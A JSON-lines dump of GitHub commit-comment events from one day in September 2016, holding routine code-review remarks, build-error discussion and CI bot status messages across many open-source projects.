{"id":"4567322755","type":"CommitCommentEvent","actor":{"login":"bhumiyar"},"repo":{"name":"texane/bano"},"payload":{"comment":{"id":19033765,"position":9,"line":95,"path":"src/base/bano_sms.c","commit_id":"b23e60016f60e9779c4f45d64bde92d5d7c82ec0","created_at":"2016-09-15T10:39:20Z","updated_at":"2016-09-15T10:39:20Z","body":" <html>\r\n<body>\r\n\r\n<form action=\"welcome.php\" method=\"post\">\r\nName: <input type=\"text\" name=\"name\"><br>\r\nE-mail: <input type=\"text\" name=\"email\"><br>\r\n<input type=\"submit\">\r\n</form>\r\n\r\n</body>\r\n</html> "}},"created_at":"2016-09-15T10:39:20Z"}
{"id":"4567323598","type":"CommitCommentEvent","actor":{"login":"nyalldawson"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":19033767,"position":103,"line":0,"path":"src/core/qgsofflineediting.cpp","commit_id":"59a3bc2ca73696df7d79c5e593cfbe258901bd50","created_at":"2016-09-15T10:39:33Z","updated_at":"2016-09-15T10:39:33Z","body":"This approach is pretty inefficient for large layers - you are still iterating through everything. Wouldn't it be better to filter fids if the selection ids are used?"}},"created_at":"2016-09-15T10:39:33Z"}
{"id":"4567325555","type":"CommitCommentEvent","actor":{"login":"duncanspumpkin"},"repo":{"name":"OpenRCT2/OpenRCT2"},"payload":{"comment":{"id":19033770,"position":5,"line":262,"path":"src/world/sprite.c","commit_id":"318adc3fa83d98945297521589d4d32bdc41bc2a","created_at":"2016-09-15T10:40:01Z","updated_at":"2016-09-15T10:40:01Z","body":"I'll take a look At the assembly but it probably is just an efficient way of doing that"}},"created_at":"2016-09-15T10:40:01Z"}
{"id":"4567327207","type":"CommitCommentEvent","actor":{"login":"lindemann09"},"repo":{"name":"expyriment/expyriment"},"payload":{"comment":{"id":19033774,"position":null,"line":null,"path":null,"commit_id":"6f20786634b519aea439fbabefa2add968f8185e","created_at":"2016-09-15T10:40:26Z","updated_at":"2016-09-15T10:40:26Z","body":"You made these changes on the master branch. Was that intended?"}},"created_at":"2016-09-15T10:40:26Z"}
{"id":"4567329509","type":"CommitCommentEvent","actor":{"login":"zador-blood-stained"},"repo":{"name":"igorpecovnik/lib"},"payload":{"comment":{"id":19033780,"position":null,"line":null,"path":null,"commit_id":"afcd2423a9d8bd350a589b35919444ab77615296","created_at":"2016-09-15T10:40:59Z","updated_at":"2016-09-15T10:40:59Z","body":"I believe this is for legacy u-boot only, mainline u-boot doesn't reference this option anywhere."}},"created_at":"2016-09-15T10:40:59Z"}
{"id":"4567329512","type":"CommitCommentEvent","actor":{"login":"tjonganthony"},"repo":{"name":"emer7/Homework-2"},"payload":{"comment":{"id":19033781,"position":null,"line":null,"path":null,"commit_id":"141918a544361592a4f22fc48f63135b51e644c6","created_at":"2016-09-15T10:40:59Z","updated_at":"2016-09-15T10:40:59Z","body":"You seem to mistake id with class.\r\nA page should only unique id for every id.\r\nSo it's not appropriate to have an id to indicate left or light alignment. It should be class instead\r\n\r\nTry removing html~ and css~ files. You should always check what's in staging before committing.\r\n\r\nYou can have id and class in one tag, and even several classes.\r\nMake sure you add an indentation for every nested tag.\r\n```\r\n<div class=\"class1 class2\" id = \"id\">\r\n    some content\r\n    <section>\r\n        some other content\r\n    </section>\r\n    <b>last content</b>\r\n</div>\r\n```"}},"created_at":"2016-09-15T10:40:59Z"}
{"id":"4567330619","type":"CommitCommentEvent","actor":{"login":"aditheking"},"repo":{"name":"Cosmic-OS/android_manifest"},"payload":{"comment":{"id":19033785,"position":null,"line":null,"path":null,"commit_id":"d061c47c54834be330b88ef2131283cf772dd7ae","created_at":"2016-09-15T10:41:15Z","updated_at":"2016-09-15T10:41:15Z","body":"messed\r\n"}},"created_at":"2016-09-15T10:41:15Z"}
{"id":"4567336244","type":"CommitCommentEvent","actor":{"login":"ytest1"},"repo":{"name":"yaegor/sandbox"},"payload":{"comment":{"id":19033798,"position":null,"line":null,"path":null,"commit_id":"c90650a74e57ffa20051da0e15098c4732bb1fd1","created_at":"2016-09-15T10:42:38Z","updated_at":"2016-09-15T10:42:38Z","body":"TeamCity Branches Tests :: Git yaegor sandbox [Build 31](http://munit-050:8112/tc/viewLog.html?buildId=99046&buildTypeId=BranchesTests_GitYaegorSandbox) outcome was **SUCCESS**\nSummary: Running Build time: 0:10:2"}},"created_at":"2016-09-15T10:42:38Z"}
{"id":"4567336450","type":"CommitCommentEvent","actor":{"login":"TiberiumPY"},"repo":{"name":"spiffy/PyRakLib"},"payload":{"comment":{"id":19033800,"position":null,"line":null,"path":null,"commit_id":"6fb5c8b20cd9181ab56762281947e96cfaa4a22a","created_at":"2016-09-15T10:42:41Z","updated_at":"2016-09-15T10:42:41Z","body":"@daniktheboss as you can see, without packets we can't do anything"}},"created_at":"2016-09-15T10:42:41Z"}
{"id":"4567338432","type":"CommitCommentEvent","actor":{"login":"Dokman"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":19033805,"position":null,"line":null,"path":null,"commit_id":"de480ec0f5d5bc36a87587c08b9bb7dbd584889f","created_at":"2016-09-15T10:43:09Z","updated_at":"2016-09-15T10:43:09Z","body":"i have it at medium"}},"created_at":"2016-09-15T10:43:09Z"}
{"id":"4567342808","type":"CommitCommentEvent","actor":{"login":"h2o64"},"repo":{"name":"Grarak/android_device_oneplus_oneplus2"},"payload":{"comment":{"id":19033841,"position":null,"line":null,"path":null,"commit_id":"1b71e76f5526055688f75a0de9df66d5a134c0c8","created_at":"2016-09-15T10:44:12Z","updated_at":"2016-09-15T10:44:12Z","body":"Crazy man ^^ is it angler blobs or regenerated bsp? "}},"created_at":"2016-09-15T10:44:12Z"}
{"id":"4567345021","type":"CommitCommentEvent","actor":{"login":"KevinEtienne"},"repo":{"name":"incuna/incuna-surveys"},"payload":{"comment":{"id":19033846,"position":11,"line":10,"path":"surveys/serializer_field_generators.py","commit_id":"f1947adbf9d15028184203b50ce2b3f417a903e9","created_at":"2016-09-15T10:44:43Z","updated_at":"2016-09-15T10:44:43Z","body":"Is it supposed to have a comma here? @maxpeterson "}},"created_at":"2016-09-15T10:44:43Z"}
{"id":"4567349064","type":"CommitCommentEvent","actor":{"login":"pventafridda"},"repo":{"name":"LK8000/LK8000"},"payload":{"comment":{"id":19033866,"position":5,"line":203,"path":"Common/Source/Comm/ComPort.cpp","commit_id":"96dd04a291aa023bd5f7fac2576d0e9aba65dd73","created_at":"2016-09-15T10:45:39Z","updated_at":"2016-09-15T10:45:39Z","body":"Fixed.\nBut when compiling for linux I always get\nminimize Bin/LINUX/Data/Dialogs/dlgAirspaceDetails.min.xml\n  minimize Bin/LINUX/Data/Dialogs/dlgAirspace_L.min.xml\nruntime error\nxsltApplyStylesheet: saving to Bin/LINUX/Data/Dialogs/dlgAirspaceColours_L.min.xml may not be possible\nmake: *** [Bin/LINUX/Data/Dialogs/dlgAirspaceColours_L.min.xml] Error 9\nmake: *** Waiting for unfinished jobs....\n  minimize Bin/LINUX/Data/Dialogs/dlgAirspacePatterns_L.min.xml\n\nFrom: Bruno de Lacheisserie \nSent: Thursday, September 15, 2016 9:58 AM\nTo: LK8000/LK8000 \nCc: Paolo Ventafridda ; Author \nSubject: Re: [LK8000/LK8000] Fix minor unused variables out of testbench mode (96dd04a)\n\nbug : no more notification about SerialPort Error with this change.\n\n—\nYou are receiving this because you authored the thread.\nReply to this email directly, view it on GitHub, or mute the thread.\n"}},"created_at":"2016-09-15T10:45:39Z"}
{"id":"4567349750","type":"CommitCommentEvent","actor":{"login":"DQvsRA"},"repo":{"name":"Gamua/Starling-Framework"},"payload":{"comment":{"id":19033868,"position":null,"line":null,"path":null,"commit_id":"7e20a4930db0383ac555b99cdf45c997afb07bdb","created_at":"2016-09-15T10:45:49Z","updated_at":"2016-09-15T10:45:49Z","body":"> Which property are you talking about?\r\nSorry for that i missed a names\r\n\r\n> I had problem with local consts (not all of them, however) where the build simply didn't run. \r\nIt's strange i never experienced this issue on iOS devices, AIR 3.4 or later\r\n"}},"created_at":"2016-09-15T10:45:49Z"}
{"id":"4567354567","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":19033893,"position":null,"line":null,"path":null,"commit_id":"6bdada726a8906b23c1dd6a4d3deae41e7080276","created_at":"2016-09-15T10:47:02Z","updated_at":"2016-09-15T10:47:02Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/460/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-2018)."}},"created_at":"2016-09-15T10:47:02Z"}
{"id":"4567357546","type":"CommitCommentEvent","actor":{"login":"gregory38"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":19033902,"position":null,"line":null,"path":null,"commit_id":"de480ec0f5d5bc36a87587c08b9bb7dbd584889f","created_at":"2016-09-15T10:47:47Z","updated_at":"2016-09-15T10:47:47Z","body":"Is crc hack enabled ?"}},"created_at":"2016-09-15T10:47:47Z"}
{"id":"4567359860","type":"CommitCommentEvent","actor":{"login":"mullerlele"},"repo":{"name":"xeolabs/scenejs"},"payload":{"comment":{"id":19033908,"position":493,"line":17780,"path":"api/latest/scenejs.js","commit_id":"e6a3a2bb6f05930fd986a7dcccb677339cd3e21c","created_at":"2016-09-15T10:48:19Z","updated_at":"2016-09-15T10:48:19Z","body":"@xeolabs Why is it forced to be 'true' here?"}},"created_at":"2016-09-15T10:48:19Z"}
{"id":"4567363730","type":"CommitCommentEvent","actor":{"login":"typicode"},"repo":{"name":"typicode/jsonplaceholder"},"payload":{"comment":{"id":19033924,"position":null,"line":null,"path":null,"commit_id":"4df8ecb7dd546ab86ef6a8e2cf75f8c9152d9417","created_at":"2016-09-15T10:49:15Z","updated_at":"2016-09-15T10:49:15Z","body":"Thank you for the concern. Just double checked on npmjs, and the latest release is `0.3.3` so I think 3 is ok.\r\nIf another version is published, I'll update of course :)\r\n"}},"created_at":"2016-09-15T10:49:15Z"}
{"id":"4567364887","type":"CommitCommentEvent","actor":{"login":"ytest1"},"repo":{"name":"yaegor/sandbox"},"payload":{"comment":{"id":19033931,"position":null,"line":null,"path":null,"commit_id":"cbff64232e22360c7d2fe3a2ca8b082b39288b4b","created_at":"2016-09-15T10:49:33Z","updated_at":"2016-09-15T10:49:33Z","body":"TeamCity Branches Tests :: Git yaegor sandbox [Build 32](http://munit-050:8112/tc/viewLog.html?buildId=99047&buildTypeId=BranchesTests_GitYaegorSandbox) is now running\n"}},"created_at":"2016-09-15T10:49:33Z"}
{"id":"4567365263","type":"CommitCommentEvent","actor":{"login":"xispa"},"repo":{"name":"bikalabs/bika.lims"},"payload":{"comment":{"id":19033933,"position":7,"line":260,"path":"bika/lims/browser/calcs.py","commit_id":"1a28009617bc2f61a518afa02d46c55ad49af9ed","created_at":"2016-09-15T10:49:38Z","updated_at":"2016-09-15T10:49:38Z","body":"was me... I guess: root <root@lynn> \r\nApologies... for both things:\r\na) WTF I used root for this?\r\nb) For shadowing \"uid\""}},"created_at":"2016-09-15T10:49:38Z"}
{"id":"4567365717","type":"CommitCommentEvent","actor":{"login":"Dokman"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":19033935,"position":null,"line":null,"path":null,"commit_id":"de480ec0f5d5bc36a87587c08b9bb7dbd584889f","created_at":"2016-09-15T10:49:44Z","updated_at":"2016-09-15T10:49:44Z","body":"in parcial"}},"created_at":"2016-09-15T10:49:44Z"}
{"id":"4567366498","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_kv"},"payload":{"comment":{"id":19033936,"position":null,"line":null,"path":null,"commit_id":"709b4e5758e997f888e5c0356e46640cdd5a4388","created_at":"2016-09-15T10:49:55Z","updated_at":"2016-09-15T10:49:55Z","body":"fast-forwarding riak_ts-develop to borshop-integration-1478-fix-az-explain_column_type = c32b52de"}},"created_at":"2016-09-15T10:49:55Z"}
{"id":"4567368142","type":"CommitCommentEvent","actor":{"login":"kingthorin"},"repo":{"name":"rscipien/zap-extensions"},"payload":{"comment":{"id":19033944,"position":43,"line":43,"path":"test/org/zaproxy/zap/extension/pscanrulesBeta/CharsetMismatchScannerUnitTest.java","commit_id":"2b4653d44c2995725c80a8b04d9a13bcd50f0872","created_at":"2016-09-15T10:50:20Z","updated_at":"2016-09-15T10:50:20Z","body":"There seems to be a discrepancy in indentation between the vars above and here. Spaces vs tabs?"}},"created_at":"2016-09-15T10:50:20Z"}
{"id":"4567370062","type":"CommitCommentEvent","actor":{"login":"faassen"},"repo":{"name":"morepath/reg"},"payload":{"comment":{"id":19033949,"position":null,"line":null,"path":null,"commit_id":"92ddf5d02e9bdf02ab900a96560905bce89f324b","created_at":"2016-09-15T10:50:48Z","updated_at":"2016-09-15T10:50:48Z","body":"What value does feature detection add? We don't really expect a version of Python 3 where there is a basestring, do we? I guess it eliminates a line of code, but I think the result is that this code becomes a little bit harder to read, as it's not clear from context whether Python 2 or Python 3 features the basestring."}},"created_at":"2016-09-15T10:50:48Z"}
{"id":"4567370550","type":"CommitCommentEvent","actor":{"login":"kingthorin"},"repo":{"name":"rscipien/zap-extensions"},"payload":{"comment":{"id":19033951,"position":41,"line":41,"path":"test/org/zaproxy/zap/extension/pscanrulesBeta/CharsetMismatchScannerUnitTest.java","commit_id":"2b4653d44c2995725c80a8b04d9a13bcd50f0872","created_at":"2016-09-15T10:50:56Z","updated_at":"2016-09-15T10:50:56Z","body":"One of these blanks could be removed"}},"created_at":"2016-09-15T10:50:56Z"}
{"id":"4567372575","type":"CommitCommentEvent","actor":{"login":"gregory38"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":19033956,"position":null,"line":null,"path":null,"commit_id":"de480ec0f5d5bc36a87587c08b9bb7dbd584889f","created_at":"2016-09-15T10:51:24Z","updated_at":"2016-09-15T10:51:24Z","body":"Could you post a screenshot of your config. And of the shadows issue."}},"created_at":"2016-09-15T10:51:24Z"}
{"id":"4567374785","type":"CommitCommentEvent","actor":{"login":"kingthorin"},"repo":{"name":"rscipien/zap-extensions"},"payload":{"comment":{"id":19033968,"position":47,"line":47,"path":"test/org/zaproxy/zap/extension/pscanrulesBeta/CharsetMismatchScannerUnitTest.java","commit_id":"2b4653d44c2995725c80a8b04d9a13bcd50f0872","created_at":"2016-09-15T10:51:57Z","updated_at":"2016-09-15T10:51:57Z","body":"One of these blanks could be removed. Assume this applies to all forward occurrences."}},"created_at":"2016-09-15T10:51:57Z"}
{"id":"4567376090","type":"CommitCommentEvent","actor":{"login":"m-kuhn"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":19033970,"position":103,"line":0,"path":"src/core/qgsofflineediting.cpp","commit_id":"59a3bc2ca73696df7d79c5e593cfbe258901bd50","created_at":"2016-09-15T10:52:16Z","updated_at":"2016-09-15T10:52:16Z","body":"Thanks, fixed in ab6d796e08f2c0255f53aaeb49b4b7155c9b8e0f"}},"created_at":"2016-09-15T10:52:16Z"}
{"id":"4567376201","type":"CommitCommentEvent","actor":{"login":"pipping"},"repo":{"name":"jcbeaudoin/MKCL"},"payload":{"comment":{"id":19033971,"position":null,"line":null,"path":null,"commit_id":"fc50d0038f2f1579fbb7c6ae930c1d111448346e","created_at":"2016-09-15T10:52:18Z","updated_at":"2016-09-15T10:52:18Z","body":"I believe there's a dependency missing in the Makefile. creating lsp/git_describe.lsp by running `make lsp/git_describe.lsp` in src/ works. But that target isn't pulled in automatically when I run plain `make`, leading to an error."}},"created_at":"2016-09-15T10:52:18Z"}
{"id":"4567376609","type":"CommitCommentEvent","actor":{"login":"midzata"},"repo":{"name":"midzata/hello-world"},"payload":{"comment":{"id":19033973,"position":null,"line":null,"path":null,"commit_id":"1b47ac2244eb6c1f11c1041dda4b30f378460d03","created_at":"2016-09-15T10:52:24Z","updated_at":"2016-09-15T10:52:24Z","body":"komnentar na drugo update so (1 parent 4e0a0be ) bez komit"}},"created_at":"2016-09-15T10:52:24Z"}
{"id":"4567377851","type":"CommitCommentEvent","actor":{"login":"kppankratz"},"repo":{"name":"smeighan/xLights"},"payload":{"comment":{"id":19033979,"position":null,"line":null,"path":null,"commit_id":"9a1aaecf4406bf252c113086c1d9597b94230449","created_at":"2016-09-15T10:52:41Z","updated_at":"2016-09-15T10:52:41Z","body":"Only a suggestion, but what if there was a single \"insert row\" option under the right click menu.  You select that and a window would open up allowing you enter the number of rows to insert and two options to select if it's above or below.  This would help limit the size of the right click menu size, but not sure how complicated it is to implement pop up windows?"}},"created_at":"2016-09-15T10:52:41Z"}
{"id":"4567380839","type":"CommitCommentEvent","actor":{"login":"Dokman"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":19033984,"position":null,"line":null,"path":null,"commit_id":"de480ec0f5d5bc36a87587c08b9bb7dbd584889f","created_at":"2016-09-15T10:53:26Z","updated_at":"2016-09-15T10:53:26Z","body":"![image](https://cloud.githubusercontent.com/assets/2290904/18547344/3ad21de8-7b43-11e6-96c5-74562d225fd0.png)\r\n![image](https://cloud.githubusercontent.com/assets/2290904/18547356/4b8b2846-7b43-11e6-9f7c-80eeed3bd736.png)\r\n"}},"created_at":"2016-09-15T10:53:26Z"}
{"id":"4567383151","type":"CommitCommentEvent","actor":{"login":"pipping"},"repo":{"name":"jcbeaudoin/MKCL"},"payload":{"comment":{"id":19033987,"position":21,"line":21,"path":"src/git_describe_this_mkcl.sh","commit_id":"fc50d0038f2f1579fbb7c6ae930c1d111448346e","created_at":"2016-09-15T10:53:59Z","updated_at":"2016-09-15T10:53:59Z","body":"There's a typo here."}},"created_at":"2016-09-15T10:53:59Z"}
{"id":"4567389150","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19033998,"position":35,"line":435,"path":"src/utils/polygon.cpp","commit_id":"baf8f49360099b22bb802a23465999cf952c6565","created_at":"2016-09-15T10:55:22Z","updated_at":"2016-09-15T10:55:22Z","body":"added comments"}},"created_at":"2016-09-15T10:55:22Z"}
{"id":"4567389818","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":19034000,"position":null,"line":null,"path":null,"commit_id":"4543a801eea88fbf9dc565fe438adeb973d28523","created_at":"2016-09-15T10:55:31Z","updated_at":"2016-09-15T10:55:31Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/461/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-2018)."}},"created_at":"2016-09-15T10:55:31Z"}
{"id":"4567390151","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19034002,"position":5,"line":420,"path":"src/utils/polygon.cpp","commit_id":"26757ef8020f1d3d01e23348bab5cefb332cfb47","created_at":"2016-09-15T10:55:36Z","updated_at":"2016-09-15T10:55:36Z","body":"ok"}},"created_at":"2016-09-15T10:55:36Z"}
{"id":"4567391812","type":"CommitCommentEvent","actor":{"login":"pventafridda"},"repo":{"name":"LK8000/LK8000"},"payload":{"comment":{"id":19034005,"position":5,"line":203,"path":"Common/Source/Comm/ComPort.cpp","commit_id":"96dd04a291aa023bd5f7fac2576d0e9aba65dd73","created_at":"2016-09-15T10:56:00Z","updated_at":"2016-09-15T10:56:00Z","body":"solved by cleani\n\nFrom: Bruno de Lacheisserie \nSent: Thursday, September 15, 2016 9:58 AM\nTo: LK8000/LK8000 \nCc: Paolo Ventafridda ; Author \nSubject: Re: [LK8000/LK8000] Fix minor unused variables out of testbench mode (96dd04a)\n\nbug : no more notification about SerialPort Error with this change.\n\n—\nYou are receiving this because you authored the thread.\nReply to this email directly, view it on GitHub, or mute the thread.\n"}},"created_at":"2016-09-15T10:56:00Z"}
{"id":"4567392067","type":"CommitCommentEvent","actor":{"login":"brunotl"},"repo":{"name":"LK8000/LK8000"},"payload":{"comment":{"id":19034006,"position":5,"line":203,"path":"Common/Source/Comm/ComPort.cpp","commit_id":"96dd04a291aa023bd5f7fac2576d0e9aba65dd73","created_at":"2016-09-15T10:56:04Z","updated_at":"2016-09-15T10:56:04Z","body":"xsltApplyStylesheet happen only with parallel build, it's because 2 or more xsltproc process try to create same directory at same time\r\n\r\nrun \"make\" again without -j option"}},"created_at":"2016-09-15T10:56:04Z"}
{"id":"4567392257","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19034007,"position":5,"line":420,"path":"src/utils/polygon.cpp","commit_id":"26757ef8020f1d3d01e23348bab5cefb332cfb47","created_at":"2016-09-15T10:56:08Z","updated_at":"2016-09-15T10:56:08Z","body":"It's in the header file..."}},"created_at":"2016-09-15T10:56:08Z"}
{"id":"4567393753","type":"CommitCommentEvent","actor":{"login":"kingthorin"},"repo":{"name":"rscipien/zap-extensions"},"payload":{"comment":{"id":19034010,"position":34,"line":34,"path":"test/org/zaproxy/zap/extension/pscanrulesBeta/CharsetMismatchScannerUnitTest.java","commit_id":"2b4653d44c2995725c80a8b04d9a13bcd50f0872","created_at":"2016-09-15T10:56:28Z","updated_at":"2016-09-15T10:56:28Z","body":"One of these blanks could be removed "}},"created_at":"2016-09-15T10:56:28Z"}
{"id":"4567394316","type":"CommitCommentEvent","actor":{"login":"jfr3000"},"repo":{"name":"fredpinon/Fred"},"payload":{"comment":{"id":19034013,"position":null,"line":null,"path":null,"commit_id":"8183834b215f9afa39bc7e46c1b8734e3eed859d","created_at":"2016-09-15T10:56:36Z","updated_at":"2016-09-15T10:56:36Z","body":"when I enter \"A\" in the prompt the program doesn't respond appropriately (not at all)..."}},"created_at":"2016-09-15T10:56:36Z"}
{"id":"4567394470","type":"CommitCommentEvent","actor":{"login":"davidfestal"},"repo":{"name":"ceylon/ceylon-ide-intellij"},"payload":{"comment":{"id":19034014,"position":36,"line":262,"path":"jps-plugin/src/org/intellij/plugins/ceylon/jps/CeylonBuilder.java","commit_id":"16e5f0355fde128950d676348325ff30355074b1","created_at":"2016-09-15T10:56:38Z","updated_at":"2016-09-15T10:56:38Z","body":"The fact that you know depend on repositories in `ceylon.config` seems incompatible with compiling dependent projects. Let me explain: a project with a required project explicitly adds in its repositories thet output repository of the required project. Look at the end of `CeylonProject.createRepositoryManager()`:\r\n```\r\n        .systemRepo(systemRepository)\r\n        .extraUserRepos(Arrays.asList(\r\n            for (p in referencedCeylonProjects)\r\n            javaString(p.ceylonModulesOutputDirectory.absolutePath)))\r\n```\r\n\r\nThese additional required project output repos should not be added in the ceylon config file since it is a IDE-only thing. So when compiling in out-process the archives of the required projects will not be seen."}},"created_at":"2016-09-15T10:56:38Z"}
{"id":"4567395231","type":"CommitCommentEvent","actor":{"login":"xeolabs"},"repo":{"name":"xeolabs/scenejs"},"payload":{"comment":{"id":19034018,"position":493,"line":17780,"path":"api/latest/scenejs.js","commit_id":"e6a3a2bb6f05930fd986a7dcccb677339cd3e21c","created_at":"2016-09-15T10:56:48Z","updated_at":"2016-09-15T10:56:48Z","body":"That's a bug."}},"created_at":"2016-09-15T10:56:48Z"}
{"id":"4567395257","type":"CommitCommentEvent","actor":{"login":"sanjosh"},"repo":{"name":"openvstorage/gobjfs"},"payload":{"comment":{"id":19034019,"position":null,"line":null,"path":null,"commit_id":"74a8342ec76d4447292054b2a9cbbc81eac938fe","created_at":"2016-09-15T10:56:49Z","updated_at":"2016-09-15T10:56:49Z","body":"\r\nIn this commit, also changed header files to initialize members of several data structures "}},"created_at":"2016-09-15T10:56:49Z"}
{"id":"4567395267","type":"CommitCommentEvent","actor":{"login":"lorenzhs"},"repo":{"name":"bingmann/thrill"},"payload":{"comment":{"id":19034020,"position":27,"line":166,"path":"thrill/core/duplicate_detection.hpp","commit_id":"53ea45700174029e3c55b7e381f1907b4b066f0f","created_at":"2016-09-15T10:56:49Z","updated_at":"2016-09-15T10:56:49Z","body":"`FindUnique`? Name sounds weird."}},"created_at":"2016-09-15T10:56:49Z"}
{"id":"4567397160","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19034030,"position":15,"line":609,"path":"src/utils/polygon.cpp","commit_id":"62dd1c1575852805db09dfe3ba3b4d277c65521d","created_at":"2016-09-15T10:57:16Z","updated_at":"2016-09-15T10:57:16Z","body":"Yes.\r\nThis is more intuitive and it doesn't require indenting the elses below with an inversed if statement"}},"created_at":"2016-09-15T10:57:16Z"}
{"id":"4567398413","type":"CommitCommentEvent","actor":{"login":"jfr3000"},"repo":{"name":"fredpinon/Fred"},"payload":{"comment":{"id":19034033,"position":1,"line":1,"path":"wk3/try_catch_ex1.js","commit_id":"8183834b215f9afa39bc7e46c1b8734e3eed859d","created_at":"2016-09-15T10:57:34Z","updated_at":"2016-09-15T10:57:34Z","body":"rather than keeping number in a global variable, you should return it from `askForNumber` and use its return value in `translateNumberToGerman`"}},"created_at":"2016-09-15T10:57:34Z"}
{"id":"4567398829","type":"CommitCommentEvent","actor":{"login":"gregory38"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":19034034,"position":null,"line":null,"path":null,"commit_id":"de480ec0f5d5bc36a87587c08b9bb7dbd584889f","created_at":"2016-09-15T10:57:39Z","updated_at":"2016-09-15T10:57:39Z","body":"??? Could you post me a gs dump ?"}},"created_at":"2016-09-15T10:57:39Z"}
{"id":"4567399629","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19034036,"position":6,"line":244,"path":"src/utils/linearAlg2D.h","commit_id":"4f073ab23f9129761a37afd01fda427c1cb357a7","created_at":"2016-09-15T10:57:52Z","updated_at":"2016-09-15T10:57:52Z","body":"fixed"}},"created_at":"2016-09-15T10:57:52Z"}
{"id":"4567401172","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19034039,"position":16,"line":254,"path":"src/utils/linearAlg2D.h","commit_id":"4f073ab23f9129761a37afd01fda427c1cb357a7","created_at":"2016-09-15T10:58:16Z","updated_at":"2016-09-15T10:58:16Z","body":"vector from a to b\r\nvector from a to p"}},"created_at":"2016-09-15T10:58:16Z"}
{"id":"4567401198","type":"CommitCommentEvent","actor":{"login":"FlatOutPS2"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":19034040,"position":null,"line":null,"path":null,"commit_id":"de480ec0f5d5bc36a87587c08b9bb7dbd584889f","created_at":"2016-09-15T10:58:16Z","updated_at":"2016-09-15T10:58:16Z","body":"WIth the same CRC and and same GSdx settings I don't get the same issue. Do you have widescreen patch/cheats enabled?"}},"created_at":"2016-09-15T10:58:16Z"}
{"id":"4567401943","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19034043,"position":21,"line":259,"path":"src/utils/linearAlg2D.h","commit_id":"4f073ab23f9129761a37afd01fda427c1cb357a7","created_at":"2016-09-15T10:58:27Z","updated_at":"2016-09-15T10:58:27Z","body":"inline function requires that"}},"created_at":"2016-09-15T10:58:27Z"}
{"id":"4567402241","type":"CommitCommentEvent","actor":{"login":"pipping"},"repo":{"name":"jcbeaudoin/MKCL"},"payload":{"comment":{"id":19034044,"position":33,"line":33,"path":"src/git_describe_this_mkcl.sh","commit_id":"fc50d0038f2f1579fbb7c6ae930c1d111448346e","created_at":"2016-09-15T10:58:32Z","updated_at":"2016-09-15T10:58:32Z","body":"I believe `git rev-parse --abbrev-ref HEAD` will do exactly the same as this if/then/else."}},"created_at":"2016-09-15T10:58:32Z"}
{"id":"4567402560","type":"CommitCommentEvent","actor":{"login":"sergei-maertens"},"repo":{"name":"sergei-maertens/django-ponyjs"},"payload":{"comment":{"id":19034046,"position":42,"line":64,"path":"src/ponyjs/models/base.js","commit_id":"b9294b0c5419ef0a25974402aea5aa509e2fef41","created_at":"2016-09-15T10:58:37Z","updated_at":"2016-09-15T10:58:37Z","body":"Would make `Object.assign(this, data)` more sense?"}},"created_at":"2016-09-15T10:58:37Z"}
{"id":"4567402780","type":"CommitCommentEvent","actor":{"login":"jfr3000"},"repo":{"name":"fredpinon/Fred"},"payload":{"comment":{"id":19034049,"position":20,"line":20,"path":"wk3/try_catch_ex1.js","commit_id":"8183834b215f9afa39bc7e46c1b8734e3eed859d","created_at":"2016-09-15T10:58:41Z","updated_at":"2016-09-15T10:58:41Z","body":"there is a less clunky way of addressing the item in the array that matches the (number-1). no need for a loop."}},"created_at":"2016-09-15T10:58:41Z"}
{"id":"4567406292","type":"CommitCommentEvent","actor":{"login":"ytest1"},"repo":{"name":"yaegor/sandbox"},"payload":{"comment":{"id":19034116,"position":null,"line":null,"path":null,"commit_id":"cbff64232e22360c7d2fe3a2ca8b082b39288b4b","created_at":"2016-09-15T10:59:34Z","updated_at":"2016-09-15T10:59:34Z","body":"TeamCity Branches Tests :: Git yaegor sandbox [Build 32](http://munit-050:8112/tc/viewLog.html?buildId=99047&buildTypeId=BranchesTests_GitYaegorSandbox) outcome was **SUCCESS**\nSummary: Running Build time: 0:10:1"}},"created_at":"2016-09-15T10:59:34Z"}
